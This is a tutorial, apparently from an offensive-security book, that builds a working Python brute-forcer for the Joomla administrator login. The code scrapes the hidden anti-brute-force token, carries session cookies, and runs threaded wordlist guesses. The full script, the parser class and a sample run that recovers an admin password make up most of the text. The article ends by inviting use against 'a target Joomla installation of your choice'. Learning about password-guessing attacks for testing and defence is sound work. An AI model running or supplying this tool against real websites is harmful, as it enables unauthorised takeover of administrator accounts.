
How To Brute-Force HTML Form Authentication In Python
What Is HTML Form Authentication

HTML form-based authentication, usually referred to simply as form-based authentication, is a technique in which a website uses a web form to collect, and subsequently authenticate, credential information from a user agent, typically a web browser. (Note that the phrase “form-based authentication” is ambiguous.)
Brute-Forcing HTML Form Authentication
There may come a time in your web hacking career when you need either to gain access to a target or, if you’re consulting, to assess the password strength on an existing web system. It has become more and more common for web systems to have brute-force protection, whether a captcha, a simple math equation, or a login token that has to be submitted with the request. A number of brute forcers can brute-force a POST request to a login script, but in many cases they are not flexible enough to deal with dynamic content or handle simple “are you human” checks. We’ll create a simple brute forcer that will be useful against Joomla, a popular content management system. Modern Joomla systems include some basic anti-brute-force techniques, but still lack account lockouts or strong captchas by default. To brute-force Joomla, we have to meet two requirements: retrieve the login token from the login form before submitting the password attempt, and ensure that we accept cookies in our urllib2 session.
In order to parse out the login form values, we’ll use the native Python class HTMLParser. This will also be a good whirlwind tour of some additional features of urllib2 that you can employ when building tooling for your own targets. Let’s get started by having a look at the Joomla administrator login form. This can be found by browsing to http://<yourtarget>.com/administrator/. For the sake of brevity, I’ve only included the relevant form elements.
<form action="/administrator/index.php" method="post" id="form-login"
class="form-inline">
<input name="username" tabindex="1" id="mod-login-username" type="text"
class="input-medium" placeholder="User Name" size="15"/>
<input name="passwd" tabindex="2" id="mod-login-password" type="password"
class="input-medium" placeholder="Password" size="15"/>
<select id="lang" name="lang" class="inputbox advancedSelect">
<option value="" selected="selected">Language - Default</option>
<option value="en-GB">English (United Kingdom)</option>
</select>
<input type="hidden" name="option" value="com_login"/>
<input type="hidden" name="task" value="login"/>
<input type="hidden" name="return" value="aW5kZXgucGhw"/>
<input type="hidden" name="1796bae450f8430ba0d2de1656f3e0ec" value="1" />
</form>
Reading through this form, we are privy to some valuable information that we’ll need to incorporate into our brute forcer. The first is that the form gets submitted to the /administrator/index.php path as an HTTP POST. The second is the set of fields required for the form submission to be successful. In particular, if you look at the last hidden field, you’ll see that its name attribute is set to a long, randomized string. This is the essential piece of Joomla’s anti-brute-forcing technique. That randomized string is checked against your current user session, which is stored in a cookie, and even if you pass the correct credentials into the login processing script, the authentication will fail if the randomized token is not present. This means we have to use the following request flow in our brute forcer in order to be successful against Joomla:
- Retrieve the login page, and accept all cookies that are returned.
- Parse out all of the form elements from the HTML.
- Set the username and/or password to a guess from our dictionary.
- Send an HTTP POST to the login processing script including all HTML form fields and our stored cookies.
- Test to see if we have successfully logged in to the web application.
You can see that we are going to be utilizing some new and valuable techniques in this script. I will also mention that you should never “train” your tooling on a live target; always set up an installation of your target web application with known credentials and verify that you get the desired results.
Let’s open a new Python file named joomla_killer.py and enter the following code:
import urllib2
import urllib
import cookielib
import threading
import sys
import Queue
from HTMLParser import HTMLParser
# general settings
user_thread = 10
username = "admin"
wordlist_file = "/tmp/cain.txt"
resume = None
# target specific settings
target_url = "http://192.168.112.131/administrator/index.php"
target_post = "http://192.168.112.131/administrator/index.php"
These target-specific settings deserve a bit of explanation. The target_url variable is where our script will first download and parse the HTML. The target_post variable is where we will submit our brute-forcing attempt.
username_field= "username"
password_field= "passwd"
success_check = "Administration - Control Panel"
Based on our brief analysis of the HTML in the Joomla login, we can set the username_field and password_field variables to the appropriate name of the HTML elements. Our success_check variable is a string that we’ll check for after each brute-forcing attempt in order to determine whether we are successful or not.
Let’s now create the plumbing for our brute forcer; some of the following code will be familiar so I’ll only highlight the newest techniques.
class Bruter(object):
    def __init__(self, username, words):
        self.username = username
        self.password_q = words
        self.found = False
        print "Finished setting up for: %s" % username
    def run_bruteforce(self):
        # start one worker thread per configured slot
        for i in range(user_thread):
            t = threading.Thread(target=self.web_bruter)
            t.start()
    def web_bruter(self):
        while not self.password_q.empty() and not self.found:
            brute = self.password_q.get().rstrip()
            # fresh cookie jar and opener for every attempt
            jar = cookielib.FileCookieJar("cookies")
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
            # fetch the login form so we receive the session cookie and token
            response = opener.open(target_url)
            page = response.read()
            print "Trying: %s : %s (%d left)" % (self.username, brute, self.password_q.qsize())
This is our primary brute-forcing class, which will handle all of the HTTP requests and manage cookies for us. After we grab our password attempt, we set up our cookie jar using the FileCookieJar class, associating it with a file named cookies. The jar holds the cookies in memory while the opener is in use; nothing is written to that file unless the jar is explicitly saved. Next we initialize our urllib2 opener, passing in the initialized cookie jar, which tells urllib2 to hand any cookies it receives to the jar. We then make the initial request to retrieve the login form.
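For readers on Python 3, where cookielib and urllib2 became http.cookiejar and urllib.request, the same cookie-aware opener can be sketched roughly as follows. This is a minimal illustration and not part of joomla_killer.py: the helper name make_opener is hypothetical, and a plain in-memory CookieJar is swapped in for FileCookieJar on the assumption that the cookies never need to be written to disk.

```python
import http.cookiejar
import urllib.request


def make_opener():
    """Return a (jar, opener) pair; the opener stores and replays cookies via the jar."""
    # Assumption: an in-memory jar is enough, so nothing is persisted to a file.
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    return jar, opener


jar, opener = make_opener()
# No request has been made yet, so the jar starts out empty.
print(len(jar))
```

Every response fetched through opener.open() would add its cookies to jar, and later requests made through the same opener would send them back automatically.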
            # parse out the hidden fields
            parser = BruteParser()
            parser.feed(page)
            post_tags = parser.tag_results
When we have the raw HTML, we pass it off to our HTML parser by calling its feed method. The feed method itself returns nothing; the parser collects all of the retrieved form elements in its tag_results dictionary, which we then read.
            # add our username and password fields
            post_tags[username_field] = self.username
            post_tags[password_field] = brute
After we have successfully parsed the HTML, we replace the username and password fields with our brute-forcing attempt.
            login_data = urllib.urlencode(post_tags)
            login_response = opener.open(target_post, login_data)
            login_result = login_response.read()
Next we URL encode the POST variables, and then pass them in our subsequent HTTP request.
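To make the encoding step concrete, here is a small sketch of what URL-encoding a dictionary of form fields produces. It uses Python 3's urllib.parse.urlencode, the successor of urllib.urlencode, and the field values are made-up stand-ins for a parsed form plus one password guess.

```python
from urllib.parse import urlencode

# Hypothetical field values standing in for the parsed form plus one guess.
post_tags = {
    "username": "admin",
    "passwd": "p@ss word",
    "option": "com_login",
    "task": "login",
}

login_data = urlencode(post_tags)
print(login_data)

# In Python 3, urllib.request expects the POST body as bytes.
login_bytes = login_data.encode("ascii")
```

Special characters are percent-encoded and spaces become plus signs, so a password guess cannot break the structure of the request body.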
            if success_check in login_result:
                self.found = True
                print "[*] Bruteforce successful."
                print "[*] Username: %s" % self.username
                print "[*] Password: %s" % brute
                print "[*] Waiting for other threads to exit..."
After we retrieve the result of our authentication attempt, we test whether the authentication was successful or not.
Now let’s implement the core of our HTML processing. Add the following class to your joomla_killer.py script:
class BruteParser(HTMLParser):
    def __init__(self):
        HTMLParser.__init__(self)
        self.tag_results = {}
This forms the specific HTML parsing class that we want to use against our target. After you have the basics of using the HTMLParser class, you can adapt it to extract information from any web application that you might be attacking. The first thing we do is create a dictionary in which our results will be stored.
    def handle_starttag(self, tag, attrs):
        if tag == "input":
            tag_name = None
            tag_value = None
When we call the feed function, we pass in the entire HTML document, and our handle_starttag function is called whenever an opening tag is encountered. In particular, we’re looking for HTML input tags, and our main processing occurs when we determine that we have found one.
            for name, value in attrs:
                if name == "name":
                    tag_name = value
                if name == "value":
                    tag_value = value
            # store the field once all of its attributes have been examined
            if tag_name is not None:
                self.tag_results[tag_name] = tag_value
We begin iterating over the attributes of the tag, and if we find the name or value attributes, we associate them in the tag_results dictionary. After the HTML has been processed, our brute-forcing class can then replace the username and password fields while leaving the remainder of the fields intact.
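To see the extraction on its own, the sketch below runs a comparable parser over a trimmed copy of the login form. It is written for Python 3, where the class lives in html.parser, and the class name InputFieldParser and the shortened form are illustrative assumptions, not the script's own code.

```python
from html.parser import HTMLParser


class InputFieldParser(HTMLParser):
    """Collect the name/value pairs of every <input> tag in a page."""

    def __init__(self):
        super().__init__()
        self.tag_results = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        attr_map = dict(attrs)  # attrs arrives as a list of (name, value) tuples
        name = attr_map.get("name")
        if name is not None:
            # Inputs without a value attribute are stored as None.
            self.tag_results[name] = attr_map.get("value")


# Trimmed, hypothetical copy of the login form shown earlier.
sample_form = """
<form action="/administrator/index.php" method="post">
<input name="username" type="text"/>
<input name="passwd" type="password"/>
<input type="hidden" name="task" value="login"/>
<input type="hidden" name="1796bae450f8430ba0d2de1656f3e0ec" value="1" />
</form>
"""

parser = InputFieldParser()
parser.feed(sample_form)
print(parser.tag_results)
```

The username and passwd entries come back empty, which is why the brute forcer fills them in afterward, while the hidden fields, including the randomized token, are carried over unchanged.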
To wrap up our Joomla brute forcer, let’s copy-paste the build_wordlist function from our previous section and add the following code:
# paste the build_wordlist function here
words = build_wordlist(wordlist_file)
bruter_obj = Bruter(username,words)
bruter_obj.run_bruteforce()
That’s it! We simply pass in the username and our wordlist to our Bruter class and watch the magic happen.
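The build_wordlist function itself is not reproduced in this article. As a rough stand-in, a function of that shape might look like the Python 3 sketch below: it reads one candidate per line into a queue and can optionally skip ahead to just past a resume word. The resume parameter, the text-mode file handling, and the temporary demo file are all assumptions made for illustration, so treat this as a hypothetical reconstruction, not the original function.

```python
import os
import queue
import tempfile


def build_wordlist(wordlist_file, resume=None):
    """Read one word per line into a queue, optionally starting just after `resume`."""
    words = queue.Queue()
    found_resume = resume is None  # with no resume point, queue from the first line
    with open(wordlist_file, "r", encoding="utf-8", errors="ignore") as fd:
        for line in fd:
            word = line.rstrip()
            if found_resume:
                words.put(word)
            elif word == resume:
                found_resume = True  # start queuing from the next word
    return words


# Demo with a throwaway three-word file (hypothetical data).
with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as tmp:
    tmp.write("alpha\nbravo\ncharlie\n")
demo_words = build_wordlist(tmp.name)
print(demo_words.qsize())
os.remove(tmp.name)
```

A queue is a natural fit here because several worker threads can pull from it concurrently without handing out the same word twice.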
HTMLParser 101

There are three primary methods you can implement when using the HTMLParser class: handle_starttag, handle_endtag, and handle_data. The handle_starttag function will be called any time an opening HTML tag is encountered, and the opposite is true for the handle_endtag function, which gets called each time a closing HTML tag is encountered. The handle_data function gets called when there is raw text in between tags. The function prototypes for each function are slightly different, as follows:
handle_starttag(self, tag, attributes)
handle_endtag(self, tag)
handle_data(self, data)
A quick example to highlight this:
<title>Python rocks!</title>
handle_starttag => tag variable would be "title"
handle_data => data variable would be "Python rocks!"
handle_endtag => tag variable would be "title"
With this very basic understanding of the HTMLParser class, you can do things like parse forms, find links for spidering, extract all of the pure text for data mining purposes, or find all of the images in a page.
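The callback sequence for the title example can be observed directly with a parser that simply logs each call. This is a minimal Python 3 sketch (html.parser in place of the Python 2 HTMLParser module), and the class name EventLogger is made up for the illustration.

```python
from html.parser import HTMLParser


class EventLogger(HTMLParser):
    """Record which callback fires for each piece of markup."""

    def __init__(self):
        super().__init__()
        self.events = []

    def handle_starttag(self, tag, attrs):
        self.events.append(("handle_starttag", tag))

    def handle_endtag(self, tag):
        self.events.append(("handle_endtag", tag))

    def handle_data(self, data):
        self.events.append(("handle_data", data))


logger = EventLogger()
logger.feed("<title>Python rocks!</title>")
logger.close()  # flush any text the parser is still buffering
for callback, value in logger.events:
    print(callback, "=>", value)
```

Overriding only the callbacks you care about is the usual pattern: a link spider would watch for "a" tags in handle_starttag, while a text extractor would only implement handle_data.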
Let’s Check Our Code

If you don’t have Joomla installed in your Kali VM, then you should install it now. My target VM is at 192.168.112.131 and I am using a wordlist provided by Cain and Abel, a popular brute-forcing and cracking toolset. I have already preset the username to admin and the password to justin in the Joomla installation so that I can make sure it works. I then added justin to the cain.txt wordlist file, about 50 entries down the file. When running the script, I get the following output:
$ python2.7 joomla_killer.py
Finished setting up for: admin
Trying: admin : 0racl38 (306697 left)
Trying: admin : !@#$% (306697 left)
Trying: admin : !@#$%^ (306697 left)
--snip--
Trying: admin : 1p2o3i (306659 left)
Trying: admin : 1qw23e (306657 left)
Trying: admin : 1q2w3e (306656 left)
Trying: admin : 1sanjose (306655 left)
Trying: admin : 2 (306655 left)
Trying: admin : justin (306655 left)
Trying: admin : 2112 (306646 left)
[*] Bruteforce successful.
[*] Username: admin
[*] Password: justin
[*] Waiting for other threads to exit...
Trying: admin : 249 (306646 left)
Trying: admin : 2welcome (306646 left)
You can see that it successfully brute-forces and logs in to the Joomla administrator console. To verify, you of course would manually log in and make sure. After you test this locally and you’re certain it works, you can use this tool against a target Joomla installation of your choice.
Also Check How To Brute-Force Directories and File Locations using Python.